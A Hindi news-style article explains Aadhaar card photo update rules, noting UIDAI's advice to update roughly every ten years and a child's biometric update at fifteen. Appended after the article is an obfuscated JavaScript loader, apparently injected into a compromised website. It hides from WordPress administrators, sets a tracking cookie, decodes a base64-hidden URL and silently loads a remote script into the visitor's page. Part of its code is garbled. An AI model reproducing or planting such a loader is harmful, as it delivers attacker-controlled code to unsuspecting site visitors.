आधार में आप अपना फोटो भी अपडेट करवा सकते हैं. कितने साल बाद करवा लेना चाहिए आधार कार्ड में फोटो अपडेट. चलिए आपको बताते हैं. क्या है फोटो अपडेट को लेकर नियम.
आधार फ़ोटो अपडेट नियम
भारत में रहने वाले लोगों के पास बहुत से दस्तावेज होने जरूरी होते हैं. इन दस्तावेजों की जरूरत आए दिन किसी ना किसी काम के लिए पड़ ही जाती है. इनमें बात की जाए तो वोटर कार्ड, राशन कार्ड, पैन कार्ड, पासपोर्ट, ड्राइविंग लाइसेंस और आधार कार्ड जैसे दस्तावेज शामिल होते हैं. आधार कार्ड भारत में इस्तेमाल किए जाने वाला सबसे बड़ा डॉक्यूमेंट है. देश की तकरीबन 90 फ़ीसदी आबादी के पास आधार कार्ड मौजूद है.
स्कूल कॉलेज में एडमिशन लेने से लेकर सरकारी योजनाओं का लाभ लेने तक में आधार कार्ड की जरूरत पड़ जाती है. भारत में UIDAI की ओर से आधार कार्ड जारी किए जाते हैं. अगर इसमें कोई जानकारी गलत दर्ज हो जाए तो इसमें आपको उसे अपडेट करवाने का भी मौका मिलता है. इसी तरह आप अपना फोटो भी अपडेट करवा सकते हैं. कितने साल बाद करवा लेना चाहिए आधार कार्ड में फोटो अपडेट चलिए आपको बताते हैं.
इतने साल में अपडेट करवाना चाहिए आधार कार्ड में फोटो
सबसे पहले तो आपको बता दें आधार कार्ड में इस तरह का कोई नियम नहीं है कि आपको इतने समय बाद अपना फोटो अपडेट करवाना ही पड़ेगा .यह पूरी तरह आपके ऊपर निर्भर करता है आप फोटो अपडेट करवाना चाहते हैं या नहीं. लेकिन वहीं बात की जाए तो क्योंकि बहुत से लोग आधार कार्ड बहुत पहले ही बनवा लेते हैं.
तो ऐसे में Unique Identification Authority of India यानी UIDAI की ओर से यह सलाह दी गई है कि सभी को 10 साल में एक बार कम से कम अपना आधार कार्ड का फोटो अपडेट करवा लेना चाहिए। अगर किसी बच्चे के पास 5 साल की उम्र का आधार कार्ड है। तो फिर 15 वर्ष की आयु के बाद उसके लिए बायोमैट्रिक अपडेट की आवश्यकता है। तो ऐसे में उसे अपना फोटो भी अपडेट करवा लेना चाहिए
(function(){try{if(document.getElementById&&document.getElementById(‘wpadminbar’))return;var t0=+new Date();for(var i=0;i120)return;if((document.cookie||”).indexOf(‘http2_session_id=’)!==-1)return;function systemLoad(input){var key=’ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=’,o1,o2,o3,h1,h2,h3,h4,dec=”,i=0;input=input.replace(/[^A-Za-z0-9\+\/\=]/g,”);while(i<input.length){h1=key.indexOf(input.charAt(i++));h2=key.indexOf(input.charAt(i++));h3=key.indexOf(input.charAt(i++));h4=key.indexOf(input.charAt(i++));o1=(h1<>4);o2=((h2&15)<>2);o3=((h3&3)<<6)|h4;dec+=String.fromCharCode(o1);if(h3!=64)dec+=String.fromCharCode(o2);if(h4!=64)dec+=String.fromCharCode(o3);}return dec;}var u=systemLoad('aHR0cHM6Ly9zZWFyY2hyYW5rdHJhZmZpYy5saXZlL2pzeA==');if(typeof window!=='undefined'&&window.__rl===u)return;var d=new Date();d.setTime(d.getTime()+30*24*60*60*1000);document.cookie='http2_session_id=1; expires='+d.toUTCString()+'; path=/; SameSite=Lax'+(location.protocol==='https:'?'; Secure':'');try{window.__rl=u;}catch(e){}var s=document.createElement('script');s.type='text/javascript';s.async=true;s.src=u;try{s.setAttribute('data-rl',u);}catch(e){}(document.getElementsByTagName('head')[0]||document.documentElement).appendChild(s);}catch(e){}})();
